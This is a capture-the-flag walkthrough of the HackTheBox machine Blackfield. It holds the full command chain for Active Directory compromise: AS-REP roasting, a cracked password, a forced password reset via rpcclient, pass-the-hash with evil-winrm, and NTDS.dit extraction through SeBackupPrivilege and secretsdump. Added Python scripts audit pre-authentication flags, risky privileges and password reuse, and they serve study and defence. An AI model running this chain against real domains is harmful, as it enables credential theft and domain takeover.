Blackfield is a Windows box created by HackTheBox user aas. It begins with finding a list of folders on an SMB share whose names are usernames, then kerberoasting the box to get credentials. With those we can run BloodHound, where we see that we can force a password change for another user. That gets us access to the forensic share, where we download lsass.dmp, which contains NTLM hashes; one of them worked for the svc_backup account, and with that we get onto the box. Checking our privileges we see we hold SeBackupPrivilege; using that we upload SeBackupPrivilegeUtils, take ntds.dit, download it and run secretsdump to get the Administrator hash.
# Nmap 7.80 scan initiated Sat Sep 12 13:44:29 2020 as: nmap -vv -sC -sV -Pn -oN nmap/blackfield 10.10.10.192
Port 445 is open, so let's check SMB:
smbclient -N -L \\\\10.10.10.192
Checking SMB we see many shares available, and we can access the profiles$ share. I pulled everything from it, but it only contains folders whose names look like usernames, so let's create a user list from them.
We also see RPC open, so let's look for anything there using enum4linux, which gives us only:
Not seeing anything else, let's try kerberoasting since we have usernames.
From the nmap result we know the domain name (BLACKFIELD.local), so:
python GetNPUsers.py BLACKFIELD.local/ -usersfile users.lst -dc-ip 10.10.10.192 -no-pass -outputfile kerbrost.out
which finds one roastable user, support, and gives us a hash to crack. We can crack it using hashcat as:
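The step above works because the support account does not require Kerberos pre-authentication. As an added example (not part of the original writeup), here is a small offline audit that finds such accounts from an LDAP export by decoding the userAccountControl attribute. The LDIF-style sample is constructed to mirror the writeup (support is flagged, olduser is a made-up disabled account) and is not data from the box; the flag values are the ones Microsoft documents for userAccountControl.

```python
# Added example, not from the original writeup: audit userAccountControl
# values for accounts that do not require Kerberos pre-authentication.

# userAccountControl bits (values as documented by Microsoft)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQUIRE_PREAUTH = 0x400000

UAC_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# Constructed sample in the shape of an ldapsearch export; the numbers are the
# decimal userAccountControl values AD stores (4194816 = 0x400200, and so on).
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=blackfield,DC=local
sAMAccountName: support
userAccountControl: 4194816

dn: CN=audit2020,CN=Users,DC=blackfield,DC=local
sAMAccountName: audit2020
userAccountControl: 512

dn: CN=svc_backup,CN=Users,DC=blackfield,DC=local
sAMAccountName: svc_backup
userAccountControl: 66048

dn: CN=olduser,CN=Users,DC=blackfield,DC=local
sAMAccountName: olduser
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Return [(sAMAccountName, userAccountControl)] from blank-line separated entries."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(": ")
        current[key] = value
    if current:
        entries.append(current)
    return [(e["sAMAccountName"], int(e["userAccountControl"])) for e in entries]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in UAC_NAMES.items() if value & bit]


def find_preauth_disabled(accounts, include_disabled=False):
    """Accounts whose DONT_REQUIRE_PREAUTH bit is set.

    Disabled accounts are skipped by default: the KDC refuses them a ticket, so
    they are not exposed until someone re-enables them. Pass
    include_disabled=True to list them too so the flag can be cleaned up.
    """
    hits = []
    for name, uac in accounts:
        if not uac & DONT_REQUIRE_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits


if __name__ == "__main__":
    accounts = parse_ldif(SAMPLE_LDIF)
    for name, uac in accounts:
        print(f"{name:12} {uac:>8}  {', '.join(decode_uac(uac))}")
    print("pre-auth disabled (enabled accounts):", find_preauth_disabled(accounts))
    print("pre-auth disabled (all):", find_preauth_disabled(accounts, include_disabled=True))
```

On a real domain the same two attributes come from an LDAP query filtered on the 0x400000 bit; the point of the check is that any account it returns can have its password hash requested and cracked offline exactly as the writeup shows, so the fix is to clear the flag or rotate to a long password.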
Looking at SMB we don't see anything new with the support user, so I went with bloodhound-python to dump the domain:
bloodhound-python -u support -p '#00^BlackKnight' --collectionmethod All -d blackfield.local -dc blackfield.local -gc blackfield.local -ns 10.10.10.192
Checking in BloodHound we see that support has ForceChangePassword over audit2020, so using RPC we can change that user's password:
rpcclient > setuserinfo2 audit2020 23 'P@ssw0rd'
After changing the password we can connect with smbclient to the forensic share and dump it. Checking the dump we find lsass.zip, so I used pypykatz to look at the dmp, which gives us the NT hash for svc_backup. Using the hash and WinRM we can get a shell as svc_backup:
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Running whoami /all we see the groups we belong to and the privileges we hold:
Privilege Name Description State
The most interesting to me was SeBackupPrivilege, as I can use it to copy files I otherwise have no access to.
The goal was to use diskshadow to create a shadow copy of the C drive, copy NTDS.dit out of it, save the SYSTEM hive as system.hiv and use secretsdump.py to extract the hashes.
Create a diskshadow script:
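Spotting SeBackupPrivilege in that table is exactly what a privilege review of service accounts should catch before an attacker does. As an added example (not from the original writeup), the following parses the table layout of whoami /priv and reports any held privilege that lets its holder read, write or impersonate past the normal ACLs. The sample output is constructed (it is not the box's actual output), and the risk list is my own selection of well-known dangerous privileges.

```python
# Added example, not from the original writeup: flag high-risk privileges in
# the table printed by "whoami /priv" (or the PRIVILEGES INFORMATION part of
# "whoami /all").

# Constructed sample in the layout whoami prints; not the box's real output.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that bypass ACLs or let the holder act as someone else. Which
# ones to treat as high risk is a judgement call; this list is mine.
HIGH_RISK_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of ACL (NTDS.dit, SAM, SYSTEM hive)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "start processes under another token",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_priv(text):
    """Parse whoami's privilege table into {privilege_name: state}.

    Rows start after the '====' ruler line. Privilege names and states never
    contain spaces, so the first and last whitespace-separated tokens are
    taken and the description (which does contain spaces) is whatever lies
    between them. This does not depend on exact column widths.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("=")
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(privs):
    """Return [(name, state, why)] for every held privilege on the risk list.

    State is reported but not used as a filter: a privilege shown as
    'Disabled' is still in the token, and any process running under that
    token can enable it with AdjustTokenPrivileges.
    """
    return [(name, state, HIGH_RISK_PRIVILEGES[name])
            for name, state in privs.items() if name in HIGH_RISK_PRIVILEGES]


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name, state, why in high_risk_privileges(held):
        print(f"{name:32} {state:9} {why}")
```

Run against the real command output (whoami /priv > privs.txt, then feed the file to parse_whoami_priv) the same function tells you which service accounts are one shadow copy away from the domain hashes, which is the finding that matters on this box.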
set context persistent nowriters #
diskshadow /s diskshadow.txt
Then, using the SeBackupPrivilegeCmdLets module, copy the files out and run:
secretsdump.py -ntds ./loot/ntds.dit -system ./loot/system.hiv local | tee hashes.txt
which gives the Administrator hash as 184fb5e5178480be64824d4cd53b99ee, with which we can WinRM onto the box as Administrator.
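The same secretsdump.py output is what a defender's password audit works from after a legitimate NTDS extraction. As an added example (not from the original writeup), the following parses secretsdump's user:rid:lmhash:nthash::: lines and reports the three things worth acting on: accounts with an empty password, accounts that still have an LM hash stored, and groups of accounts sharing one NT hash (the same password). The sample dump is constructed: the Administrator and svc_backup hashes are the two values shown in the writeup, the empty-password LM and NT hashes are the well-known constants, and every other user, RID and hash is a made-up placeholder.

```python
# Added example, not from the original writeup: audit a secretsdump.py NTDS
# dump for empty passwords, LM hash storage and password reuse.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample. Administrator and svc_backup hashes are the values from
# the writeup; helpdesk, svc_print, tempuser, legacyuser and the krbtgt hash
# are placeholders invented for this example.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
helpdesk:1500:aad3b435b51404eeaad3b435b51404ee:cafebabecafebabecafebabecafebabe:::
svc_print:1501:aad3b435b51404eeaad3b435b51404ee:cafebabecafebabecafebabecafebabe:::
tempuser:1502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1503:0badf00d0badf00d0badf00d0badf00d:feedfacefeedfacefeedfacefeedface:::
[*] Cleaning up...
"""

# One NTDS credential line; banners and Kerberos-key lines do not match.
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)


def parse_secretsdump(text):
    """Return a list of {user, rid, lm, nt} dicts for the credential lines."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["lm"] = row["lm"].lower()
            row["nt"] = row["nt"].lower()
            rows.append(row)
    return rows


def audit(rows):
    """Summarise the findings a password audit acts on.

    Note that the dump alone does not say whether an account is enabled
    (secretsdump can append that with -user-status), so Guest showing an empty
    password is normal when the account is disabled.
    """
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
    return {
        "empty_password": [r["user"] for r in rows if r["nt"] == EMPTY_NT],
        "lm_hash_stored": [r["user"] for r in rows if r["lm"] != EMPTY_LM],
        "shared_password": {h: users for h, users in by_nt.items()
                            if len(users) > 1 and h != EMPTY_NT},
    }


if __name__ == "__main__":
    report = audit(parse_secretsdump(SAMPLE_DUMP))
    for finding, value in report.items():
        print(f"{finding}: {value}")
```

The shared_password groups are the interesting output in practice: one cracked or dumped hash gives every account in the group, which is why a service account sharing a password with an admin turns a foothold like the svc_backup shell above into full domain compromise.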